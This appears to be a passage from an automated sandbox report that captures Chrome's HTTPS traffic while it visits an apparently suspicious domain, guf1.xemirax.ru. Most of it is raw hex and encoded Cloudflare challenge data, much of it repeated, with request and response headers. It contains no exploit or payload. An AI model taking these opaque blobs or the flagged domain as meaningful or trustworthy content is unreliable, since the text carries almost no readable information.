                                                          2025-01-16 04:17:34 UTC1369INData Raw: 78 75 59 58 4e 57 6b 32 31 38 68 33 6d 58 62 6e 75 50 59 6e 68 76 66 31 39 78 65 6f 65 62 6c 34 43 48 65 34 79 6f 6a 34 71 74 69 61 32 77 74 6e 61 78 74 5a 65 4b 6c 6e 65 51 73 4a 57 73 72 4a 57 37 76 4b 58 4b 68 70 79 6b 70 4a 2f 4b 6d 38 69 66 73 38 4b 71 6b 73 4b 31 72 63 50 50 6d 37 33 4e 71 4b 75 68 33 5a 2b 39 77 74 54 67 34 4b 58 68 71 61 54 4b 70 74 6a 72 72 62 36 79 72 65 72 74 78 65 4c 36 7a 75 6a 39 2f 72 72 50 76 39 6d 2b 76 2f 44 43 2f 66 6f 48 39 73 72 68 36 64 63 4d 34 73 66 68 44 41 34 4c 44 75 4c 4a 34 76 63 4b 37 42 6e 2b 39 51 73 4b 38 67 37 30 49 66 41 6c 38 74 37 30 4b 69 59 6e 36 41 4d 6f 42 69 45 52 49 77 6f 6d 48 79 30 4e 42 51 55 74 46 41 6f 2f 4f 52 59 50 48 54 30 61 46 43 46 42 48 68 6b 6c 52 53 49 65 4b 55 6b 6d 49 79 31 4e 4b
                                                          Data Ascii: xuYXNWk218h3mXbnuPYnhvf19xeoebl4CHe4yoj4qtia2wtnaxtZeKlneQsJWsrJW7vKXKhpykpJ/Km8ifs8KqksK1rcPPm73NqKuh3Z+9wtTg4KXhqaTKptjrrb6yrertxeL6zuj9/rrPv9m+v/DC/foH9srh6dcM4sfhDA4LDuLJ4vcK7Bn+9QsK8g70IfAl8t70KiYn6AMoBiERIwomHy0NBQUtFAo/ORYPHT0aFCFBHhklRSIeKUkmIy1NK
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 36 62 6f 31 73 6d 70 69 4d 6b 56 71 45 6e 4b 4f 57 6f 58 71 65 6c 4b 61 4e 6a 49 47 69 66 36 4b 73 6b 48 4a 70 72 37 71 45 67 37 4b 2b 76 71 6d 34 77 71 43 78 74 33 32 4f 6e 62 62 47 79 71 6d 63 76 73 37 49 70 36 57 37 73 4b 66 50 6f 61 65 79 6d 5a 50 56 79 38 33 54 31 36 71 66 34 64 71 75 33 35 37 63 73 37 37 6c 35 4c 62 44 32 65 43 34 79 4c 4c 6b 76 4d 32 32 36 4d 44 53 74 65 54 75 38 37 43 37 38 37 76 68 76 2f 71 39 34 37 6b 45 2b 41 49 4b 44 4f 33 37 34 76 44 39 33 67 50 70 78 2b 37 32 39 2f 6b 4a 45 68 45 50 33 42 44 30 46 66 58 76 41 67 45 56 2b 50 51 6d 38 78 6f 64 35 67 67 67 4d 53 45 68 4e 42 55 6e 42 7a 67 77 47 68 59 6f 37 6a 4d 31 49 54 6b 53 48 43 49 6d 44 76 30 59 45 7a 78 41 42 45 63 67 48 79 67 4d 4d 52 39 55 4a 42 41 6c 52 79 6c 4a 4b 56
                                                          Data Ascii: 6bo1smpiMkVqEnKOWoXqelKaNjIGif6KskHJpr7qEg7K+vqm4wqCxt32OnbbGyqmcvs7Ip6W7sKfPoaeymZPVy83T16qf4dqu357cs77l5LbD2eC4yLLkvM226MDSteTu87C787vhv/q947kE+AIKDO374vD93gPpx+729/kJEhEP3BD0FfXvAgEV+PQm8xod5gggMSEhNBUnBzgwGhYo7jM1ITkSHCImDv0YEzxABEcgHygMMR9UJBAlRylJKV
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 6e 48 6c 30 67 4b 42 39 65 59 53 6b 67 58 36 49 71 49 57 5a 66 4a 4b 51 66 58 4f 42 62 6f 71 61 71 35 4f 50 75 48 37 41 74 34 43 51 6c 4d 57 36 6d 70 65 66 6f 70 54 46 77 61 71 6c 79 71 2b 52 6e 39 4b 4f 30 4b 65 53 79 64 4c 48 32 37 57 73 7a 64 65 2f 30 72 32 78 74 36 4c 6b 35 62 54 66 71 62 37 70 33 62 71 76 77 50 4c 42 73 63 58 70 37 4d 57 78 36 64 71 30 2b 4c 37 2b 36 63 44 54 41 74 61 33 42 77 54 39 43 38 49 48 36 41 76 73 31 77 76 4a 43 39 4c 64 39 66 49 57 31 75 6e 72 43 2f 48 7a 46 66 63 56 47 42 59 61 47 79 66 63 47 2f 6b 47 35 76 50 31 2f 42 2f 73 48 65 30 71 4c 54 59 54 4d 53 63 56 38 79 34 78 39 54 51 74 4f 66 34 55 41 69 45 36 48 55 49 36 4b 55 6c 42 4c 43 46 43 49 6b 41 78 45 54 45 67 44 53 41 73 56 46 56 47 54 56 67 7a 50 56 4e 58 4f 46 67
                                                          Data Ascii: nHl0gKB9eYSkgX6IqIWZfJKQfXOBboqaq5OPuH7At4CQlMW6mpefopTFwaqlyq+Rn9KO0KeSydLH27Wszde/0r2xt6Lk5bTfqb7p3bqvwPLBscXp7MWx6dq0+L7+6cDTAta3BwT9C8IH6Avs1wvJC9Ld9fIW1unrC/HzFfcVGBYaGyfcG/kG5vP1/B/sHe0qLTYTMScV8y4x9TQtOf4UAiE6HUI6KUlBLCFCIkAxETEgDSAsVFVGTVgzPVNXOFg
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 46 78 68 72 4b 31 67 72 72 42 2f 69 71 2b 79 6e 34 4f 54 63 6e 57 71 72 6f 78 37 6a 34 69 5a 69 5a 65 37 73 58 65 41 73 4a 76 48 76 63 53 56 6e 59 53 4e 75 34 79 39 6a 5a 53 32 31 38 69 70 30 63 69 58 32 62 69 32 76 62 6a 4a 73 37 4f 7a 74 4c 48 6f 73 4f 58 63 33 36 54 48 71 73 58 4b 33 38 2f 30 37 75 2f 58 37 73 2f 50 79 73 72 59 36 63 66 77 2b 66 72 63 30 64 55 41 30 73 4c 35 78 74 7a 49 31 50 6b 4b 34 67 6a 68 34 2b 72 68 36 68 6a 58 43 76 44 76 39 67 59 58 45 78 66 7a 45 78 58 66 48 51 48 69 2f 53 41 72 38 77 51 6a 4c 79 34 71 4b 54 4d 4d 36 69 30 33 45 51 51 78 4f 78 55 59 4e 54 38 64 4c 6a 54 35 43 78 6f 7a 51 30 63 6d 47 54 74 4c 52 53 51 69 53 6c 45 4d 49 68 41 69 56 6a 4e 52 54 30 6c 61 58 45 34 6c 52 78 74 54 4c 46 77 77 59 53 34 37 58 55 4e 52
                                                          Data Ascii: FxhrK1grrB/iq+yn4OTcnWqrox7j4iZiZe7sXeAsJvHvcSVnYSNu4y9jZS218ip0ciX2bi2vbjJs7OztLHosOXc36THqsXK38/07u/X7s/PysrY6cfw+frc0dUA0sL5xtzI1PkK4gjh4+rh6hjXCvDv9gYXExfzExXfHQHi/SAr8wQjLy4qKTMM6i03EQQxOxUYNT8dLjT5CxozQ0cmGTtLRSQiSlEMIhAiVjNRT0laXE4lRxtTLFwwYS47XUNR
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 2b 52 61 33 79 31 71 4b 4f 4b 75 4c 47 70 72 59 36 58 6e 59 79 7a 76 59 2b 7a 76 62 36 62 75 37 61 47 67 4a 53 32 6e 5a 2f 4a 71 36 6e 47 72 4c 53 32 6f 71 72 41 6c 37 4c 5a 74 36 32 65 6e 63 71 58 6d 4c 7a 50 78 4d 4f 6b 77 4e 47 33 70 64 6a 62 32 36 7a 5a 73 4f 44 73 39 66 50 54 73 2f 6e 45 2b 65 58 50 7a 63 62 66 30 2f 48 2b 2f 74 76 5a 35 50 30 46 2f 74 4c 7a 79 4f 6e 75 39 2b 6f 4f 34 67 37 30 2f 68 49 55 38 78 6b 51 37 74 66 33 41 42 45 64 43 68 55 6a 47 68 34 52 4a 68 2f 37 2f 75 6f 71 41 43 6e 6d 4d 41 51 74 36 76 51 49 4d 65 38 43 44 44 58 7a 43 68 41 35 39 68 49 55 50 66 6f 61 47 45 48 2b 49 68 78 46 41 79 6f 67 53 51 63 79 4a 45 30 4c 51 43 68 52 44 30 67 73 56 52 4e 51 4d 46 6b 59 56 7a 4e 4f 50 44 42 63 4f 69 64 63 57 6a 73 72 5a 57 39 77 52
                                                          Data Ascii: +Ra3y1qKOKuLGprY6XnYyzvY+zvb6bu7aGgJS2nZ/Jq6nGrLS2oqrAl7LZt62encqXmLzPxMOkwNG3pdjb26zZsODs9fPTs/nE+eXPzcbf0/H+/tvZ5P0F/tLzyOnu9+oO4g70/hIU8xkQ7tf3ABEdChUjGh4RJh/7/uoqACnmMAQt6vQIMe8CDDXzChA59hIUPfoaGEH+IhxFAyogSQcyJE0LQChRD0gsVRNQMFkYVzNOPDBcOidcWjsrZW9wR
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 42 74 70 4e 35 71 71 71 38 6d 62 47 49 71 58 6d 6a 75 70 57 79 6c 38 44 47 68 36 43 4c 6a 61 79 58 68 39 47 69 77 4d 6d 6d 30 61 43 34 70 38 76 4b 33 64 4f 77 7a 5a 61 79 76 4d 44 4d 33 73 62 45 75 64 71 30 33 74 37 4b 35 4c 2f 68 37 75 4c 62 78 75 62 51 38 4d 2f 4e 38 76 66 7a 32 50 54 71 33 76 69 35 37 66 4c 52 76 4f 54 70 32 73 72 55 42 39 6a 6d 32 73 62 6d 45 67 34 50 42 74 37 31 39 78 6a 4d 36 39 49 56 39 68 7a 32 38 2f 62 61 49 78 6a 65 39 53 48 37 45 77 4c 36 33 77 38 48 4a 77 44 2b 2f 65 34 41 38 79 45 35 45 68 6f 52 44 7a 55 4b 49 54 76 7a 46 6a 4d 6c 2f 43 4d 5a 51 53 51 73 51 6b 6f 41 44 6b 41 6f 4d 77 78 44 4b 68 4e 50 4d 7a 67 69 55 79 34 64 4c 78 70 51 4f 44 52 64 49 32 5a 48 57 55 5a 52 58 69 4e 4a 62 6b 74 6d 59 53 78 53 4c 30 46 6c 55 48
                                                          Data Ascii: BtpN5qqq8mbGIqXmjupWyl8DGh6CLjayXh9GiwMmm0aC4p8vK3dOwzZayvMDM3sbEudq03t7K5L/h7uLbxubQ8M/N8vfz2PTq3vi57fLRvOTp2srUB9jm2sbmEg4PBt719xjM69IV9hz28/baIxje9SH7EwL63w8HJwD+/e4A8yE5EhoRDzUKITvzFjMl/CMZQSQsQkoADkAoMwxDKhNPMzgiUy4dLxpQODRdI2ZHWUZRXiNJbktmYSxSL0FlUH
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 72 6f 2b 4b 67 62 64 37 6e 4a 69 54 6f 4b 69 6c 6f 71 4f 64 77 62 65 71 71 59 32 6f 30 72 4b 79 73 62 43 71 71 4d 71 72 70 70 33 54 6c 37 69 35 73 62 7a 45 77 62 36 2f 75 64 33 54 78 4e 57 6c 78 4f 37 4f 7a 73 33 4d 78 73 54 6d 78 4d 7a 7a 39 38 61 38 32 76 32 36 30 2f 76 79 77 66 48 45 32 2b 4c 63 76 39 6f 4b 79 76 33 6c 42 64 76 36 34 50 76 65 35 67 59 59 35 52 51 4c 32 2b 7a 70 38 39 58 78 46 52 41 55 32 75 33 2b 2f 43 63 6d 36 53 51 4c 44 51 4d 59 49 76 72 77 4e 65 30 6e 46 67 4d 59 4f 6a 49 4e 4a 7a 6f 37 2f 55 48 33 48 7a 31 47 50 79 51 45 53 69 63 43 44 41 4d 5a 4f 45 67 69 42 43 63 64 55 54 63 6e 49 45 73 70 4b 30 6b 50 54 68 55 77 4d 79 45 79 51 56 46 50 58 53 56 48 57 6d 4d 30 53 32 73 33 62 53 68 44 54 48 56 6d 64 48 55 30 63 45 34 78 65 6b 39
                                                          Data Ascii: ro+Kgbd7nJiToKiloqOdwbeqqY2o0rKysbCqqMqrpp3Tl7i5sbzEwb6/ud3TxNWlxO7Ozs3MxsTmxMzz98a82v260/vywfHE2+Lcv9oKyv3lBdv64Pve5gYY5RQL2+zp89XxFRAU2u3+/Ccm6SQLDQMYIvrwNe0nFgMYOjINJzo7/UH3Hz1GPyQESicCDAMZOEgiBCcdUTcnIEspK0kPThUwMyEyQVFPXSVHWmM0S2s3bShDTHVmdHU0cE4xek9
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 6e 35 2b 66 5a 48 48 6c 5a 2b 4a 70 36 65 38 75 39 43 50 6d 36 4c 53 30 37 47 76 77 36 2f 49 72 74 62 52 33 35 32 66 33 37 61 6b 76 2b 4f 39 34 38 6a 66 31 73 75 39 70 74 71 72 75 39 76 72 78 61 66 4b 77 50 54 61 79 73 50 75 7a 4d 37 73 73 76 47 34 30 39 62 45 31 65 54 30 39 51 4c 65 78 73 33 59 36 2f 72 4d 30 65 66 71 2f 66 48 75 31 2b 4d 4f 2b 74 6a 55 38 65 66 7a 2b 39 77 65 45 52 49 44 46 53 62 37 43 67 63 56 44 52 6b 48 2b 67 59 30 4b 77 59 44 39 76 45 49 4d 41 4d 6b 37 76 30 50 41 44 2f 35 41 6a 30 50 4a 52 70 42 52 51 6c 49 42 42 38 4e 44 41 67 39 50 41 6f 55 4b 43 42 58 4a 68 5a 4b 53 45 30 6c 52 31 4d 36 4b 54 4d 73 5a 44 4a 67 56 44 30 37 59 44 5a 6f 56 79 42 5a 52 57 74 45 61 46 4e 57 56 54 5a 48 51 55 35 38 63 30 35 4c 50 7a 70 51 65 45 74 73
                                                          Data Ascii: n5+fZHHlZ+Jp6e8u9CPm6LS07Gvw6/IrtbR352f37akv+O948jf1su9ptqru9vrxafKwPTaysPuzM7ssvG409bE1eT09QLexs3Y6/rM0efq/fHu1+MO+tjU8efz+9weERIDFSb7CgcVDRkH+gY0KwYD9vEIMAMk7v0PAD/5Aj0PJRpBRQlIBB8NDAg9PAoUKCBXJhZKSE0lR1M6KTMsZDJgVD07YDZoVyBZRWtEaFNWVTZHQU58c05LPzpQeEts


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.44975635.190.80.14432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:34 UTC538OUTOPTIONS /report/v4?s=8sCMTUMDG2VsfSdc3ArV%2Br%2FNRadCkdMeik9Ze8DFnn%2B1n9SThKYUV9t1cWZVVh6M%2BQ892%2BqGUJxLthCzBZ22k5KIYAMwDI0JePi0fRnazvWXNVBkxZzUuyN0DqI9ZA%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://guf1.xemirax.ru
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:35 UTC336INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          access-control-max-age: 86400
                                                          access-control-allow-methods: OPTIONS, POST
                                                          access-control-allow-origin: *
                                                          access-control-allow-headers: content-type, content-length
                                                          date: Thu, 16 Jan 2025 04:17:34 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.44975835.190.80.14432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:35 UTC480OUTPOST /report/v4?s=8sCMTUMDG2VsfSdc3ArV%2Br%2FNRadCkdMeik9Ze8DFnn%2B1n9SThKYUV9t1cWZVVh6M%2BQ892%2BqGUJxLthCzBZ22k5KIYAMwDI0JePi0fRnazvWXNVBkxZzUuyN0DqI9ZA%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 426
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:35 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 35 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 75 66 31 2e 78 65 6d 69 72 61 78 2e 72 75 2f 36 58 41 56 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 35 2e 31 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":458,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://guf1.xemirax.ru/6XAVE/","sampling_fraction":1.0,"server_ip":"104.21.85.129","status_code":404,"type":"http.error"},"type":"network-error","
                                                          2025-01-16 04:17:35 UTC168INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          date: Thu, 16 Jan 2025 04:17:35 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.449759104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:35 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 3171
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 1
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:35 UTC3171OUTData Raw: 76 5f 39 30 32 62 34 62 65 35 31 62 61 32 37 63 36 39 3d 6b 33 6d 6a 47 6a 42 6a 37 6a 79 6a 71 38 62 52 38 62 2d 6a 38 73 32 4f 77 72 73 62 35 38 56 56 62 57 70 62 32 6f 6a 38 51 62 53 6a 32 6d 72 32 36 51 6d 62 69 65 51 62 43 49 38 25 32 62 6b 62 50 6a 38 2d 6d 62 32 45 7a 33 30 78 62 45 4f 62 4b 62 38 33 62 45 6d 4a 6f 62 70 62 30 6f 32 56 62 4f 6f 65 6d 62 37 6b 49 30 72 64 6f 7a 4a 78 77 42 62 6b 37 67 2d 46 62 35 51 49 62 67 62 76 74 39 57 51 76 73 4f 38 35 4e 74 4d 64 2b 69 2b 62 54 4b 4b 4c 35 6a 30 5a 62 32 42 68 62 53 54 67 77 52 6d 62 4a 69 62 62 71 6f 30 55 43 68 50 57 4a 2b 5a 32 6f 56 4d 30 6e 73 50 46 54 7a 71 74 62 65 42 35 39 50 30 4b 62 32 7a 62 61 34 4f 75 4c 30 24 62 4a 7a 7a 73 67 6f 62 41 53 44 49 62 24 7a 53 75 51 56 7a 36 50 39 57
                                                          Data Ascii: v_902b4be51ba27c69=k3mjGjBj7jyjq8bR8b-j8s2Owrsb58VVbWpb2oj8QbSj2mr26QmbieQbCI8%2bkbPj8-mb2Ez30xbEObKb83bEmJobpb0o2VbOoemb7kI0rdozJxwBbk7g-Fb5QIbgbvt9WQvsO85NtMd+i+bTKKL5j0Zb2BhbSTgwRmbJibbqo0UChPWJ+Z2oVM0nsPFTzqtbeB59P0Kb2zba4OuL0$bJzzsgobASDIb$zSuQVz6P9W
                                                          2025-01-16 04:17:36 UTC751INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:35 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 153164
                                                          Connection: close
                                                          cf-chl-gen: esKtcrg1uHsQteKnQCuI9I9IIgppapCiCM4Gbmi8LTO1INSIOrYhX1IzMHLcQBuBixnZ5dQKECTc9vLSX3/2YLoElHLCaiCHDc4LY7++qLgw754mP8tg7xxQFrI/EPPHri0JMYpF86tnGLTrTU6jyCRfwEcONYAxyGZoyfXIqFNWOpdXWFeW6IFc0VgUcfjfjB2lpHpDkGlm+Ny4SzwIaLf9ZAdmH8oP2ErmUPnZqpPId5VoXcOge5GD2ow4NGbEAmWapjfmfcq9Y+3PhY0M4GCdMOiBDlXcaZJ1wr51bZ6PWlT8T5Vg2aNI5VNKdyvhwd+N5OAB7FoGHpnOGzIlpq944Tf7Vo/5YKcVKLopyvUvPZgekK4paQ7mK2gX8ejYqeIYFZbaYD9xStH5jl2bnAv+19TEfusdLSZ3myFJrU5XZ2CJqLldG+eggDtGmU5/1folidPIONDwoHEa8bhffpOFIYjOAuQ5pdsiJ9NaFxg=$CFSppYt/+6XUcK0yhGmQng==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bf77a7c4386-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:36 UTC618INData Raw: 6b 6e 37 48 6c 4a 4f 38 71 36 61 71 71 59 79 4f 76 5a 47 38 75 36 32 4e 6a 73 4f 32 70 70 71 71 6d 74 61 34 79 4c 36 36 31 39 36 7a 6c 35 79 35 75 4f 4f 69 33 4d 44 61 75 73 69 36 33 36 75 71 30 75 79 6f 2b 4d 44 47 73 62 66 4e 79 63 62 52 2f 74 4c 58 38 73 4c 30 35 63 62 56 42 4f 49 45 31 4f 72 6b 37 42 48 6c 2b 2f 77 55 36 68 54 6a 7a 77 51 4d 2b 41 55 54 38 66 72 73 49 68 34 44 41 52 59 69 42 77 6e 32 4b 53 55 4c 35 42 37 37 37 53 63 4b 44 77 51 71 41 7a 63 4f 4b 68 66 31 4c 78 51 32 39 76 64 42 41 79 4d 6a 2f 54 34 58 4a 77 4a 4b 4b 54 6c 46 48 78 41 6f 48 55 67 71 4a 79 68 4f 55 44 41 69 47 69 56 47 4c 52 67 38 56 6c 70 51 57 44 5a 6e 4c 32 55 35 57 6b 64 71 53 7a 68 74 61 30 56 78 4c 32 42 45 63 55 51 32 4d 6c 5a 55 53 48 41 34 64 49 46 51 54 59 4a
                                                          Data Ascii: kn7HlJO8q6aqqYyOvZG8u62NjsO2ppqqmta4yL66196zl5y5uOOi3MDausi636uq0uyo+MDGsbfNycbR/tLX8sL05cbVBOIE1Ork7BHl+/wU6hTjzwQM+AUT8frsIh4DARYiBwn2KSUL5B777ScKDwQqAzcOKhf1LxQ29vdBAyMj/T4XJwJKKTlFHxAoHUgqJyhOUDAiGiVGLRg8VlpQWDZnL2U5WkdqSzhta0VxL2BEcUQ2MlZUSHA4dIFQTYJ
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 78 75 59 58 4e 57 6b 32 31 38 68 33 6d 58 62 6e 75 50 59 6e 68 76 66 31 39 78 65 6f 65 62 6c 34 43 48 65 34 79 6f 6a 34 71 74 69 61 32 77 74 6e 61 78 74 5a 65 4b 6c 6e 65 51 73 4a 57 73 72 4a 57 37 76 4b 58 4b 68 70 79 6b 70 4a 2f 4b 6d 38 69 66 73 38 4b 71 6b 73 4b 31 72 63 50 50 6d 37 33 4e 71 4b 75 68 33 5a 2b 39 77 74 54 67 34 4b 58 68 71 61 54 4b 70 74 6a 72 72 62 36 79 72 65 72 74 78 65 4c 36 7a 75 6a 39 2f 72 72 50 76 39 6d 2b 76 2f 44 43 2f 66 6f 48 39 73 72 68 36 64 63 4d 34 73 66 68 44 41 34 4c 44 75 4c 4a 34 76 63 4b 37 42 6e 2b 39 51 73 4b 38 67 37 30 49 66 41 6c 38 74 37 30 4b 69 59 6e 36 41 4d 6f 42 69 45 52 49 77 6f 6d 48 79 30 4e 42 51 55 74 46 41 6f 2f 4f 52 59 50 48 54 30 61 46 43 46 42 48 68 6b 6c 52 53 49 65 4b 55 6b 6d 49 79 31 4e 4b
                                                          Data Ascii: xuYXNWk218h3mXbnuPYnhvf19xeoebl4CHe4yoj4qtia2wtnaxtZeKlneQsJWsrJW7vKXKhpykpJ/Km8ifs8KqksK1rcPPm73NqKuh3Z+9wtTg4KXhqaTKptjrrb6yrertxeL6zuj9/rrPv9m+v/DC/foH9srh6dcM4sfhDA4LDuLJ4vcK7Bn+9QsK8g70IfAl8t70KiYn6AMoBiERIwomHy0NBQUtFAo/ORYPHT0aFCFBHhklRSIeKUkmIy1NK
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 36 62 6f 31 73 6d 70 69 4d 6b 56 71 45 6e 4b 4f 57 6f 58 71 65 6c 4b 61 4e 6a 49 47 69 66 36 4b 73 6b 48 4a 70 72 37 71 45 67 37 4b 2b 76 71 6d 34 77 71 43 78 74 33 32 4f 6e 62 62 47 79 71 6d 63 76 73 37 49 70 36 57 37 73 4b 66 50 6f 61 65 79 6d 5a 50 56 79 38 33 54 31 36 71 66 34 64 71 75 33 35 37 63 73 37 37 6c 35 4c 62 44 32 65 43 34 79 4c 4c 6b 76 4d 32 32 36 4d 44 53 74 65 54 75 38 37 43 37 38 37 76 68 76 2f 71 39 34 37 6b 45 2b 41 49 4b 44 4f 33 37 34 76 44 39 33 67 50 70 78 2b 37 32 39 2f 6b 4a 45 68 45 50 33 42 44 30 46 66 58 76 41 67 45 56 2b 50 51 6d 38 78 6f 64 35 67 67 67 4d 53 45 68 4e 42 55 6e 42 7a 67 77 47 68 59 6f 37 6a 4d 31 49 54 6b 53 48 43 49 6d 44 76 30 59 45 7a 78 41 42 45 63 67 48 79 67 4d 4d 52 39 55 4a 42 41 6c 52 79 6c 4a 4b 56
                                                          Data Ascii: 6bo1smpiMkVqEnKOWoXqelKaNjIGif6KskHJpr7qEg7K+vqm4wqCxt32OnbbGyqmcvs7Ip6W7sKfPoaeymZPVy83T16qf4dqu357cs77l5LbD2eC4yLLkvM226MDSteTu87C787vhv/q947kE+AIKDO374vD93gPpx+729/kJEhEP3BD0FfXvAgEV+PQm8xod5gggMSEhNBUnBzgwGhYo7jM1ITkSHCImDv0YEzxABEcgHygMMR9UJBAlRylJKV
                                                          2025-01-16 04:17:36 UTC1369INData Raw: 6e 48 6c 30 67 4b 42 39 65 59 53 6b 67 58 36 49 71 49 57 5a 66 4a 4b 51 66 58 4f 42 62 6f 71 61 71 35 4f 50 75 48 37 41 74 34 43 51 6c 4d 57 36 6d 70 65 66 6f 70 54 46 77 61 71 6c 79 71 2b 52 6e 39 4b 4f 30 4b 65 53 79 64 4c 48 32 37 57 73 7a 64 65 2f 30 72 32 78 74 36 4c 6b 35 62 54 66 71 62 37 70 33 62 71 76 77 50 4c 42 73 63 58 70 37 4d 57 78 36 64 71 30 2b 4c 37 2b 36 63 44 54 41 74 61 33 42 77 54 39 43 38 49 48 36 41 76 73 31 77 76 4a 43 39 4c 64 39 66 49 57 31 75 6e 72 43 2f 48 7a 46 66 63 56 47 42 59 61 47 79 66 63 47 2f 6b 47 35 76 50 31 2f 42 2f 73 48 65 30 71 4c 54 59 54 4d 53 63 56 38 79 34 78 39 54 51 74 4f 66 34 55 41 69 45 36 48 55 49 36 4b 55 6c 42 4c 43 46 43 49 6b 41 78 45 54 45 67 44 53 41 73 56 46 56 47 54 56 67 7a 50 56 4e 58 4f 46 67
                                                          Data Ascii: nHl0gKB9eYSkgX6IqIWZfJKQfXOBboqaq5OPuH7At4CQlMW6mpefopTFwaqlyq+Rn9KO0KeSydLH27Wszde/0r2xt6Lk5bTfqb7p3bqvwPLBscXp7MWx6dq0+L7+6cDTAta3BwT9C8IH6Avs1wvJC9Ld9fIW1unrC/HzFfcVGBYaGyfcG/kG5vP1/B/sHe0qLTYTMScV8y4x9TQtOf4UAiE6HUI6KUlBLCFCIkAxETEgDSAsVFVGTVgzPVNXOFg
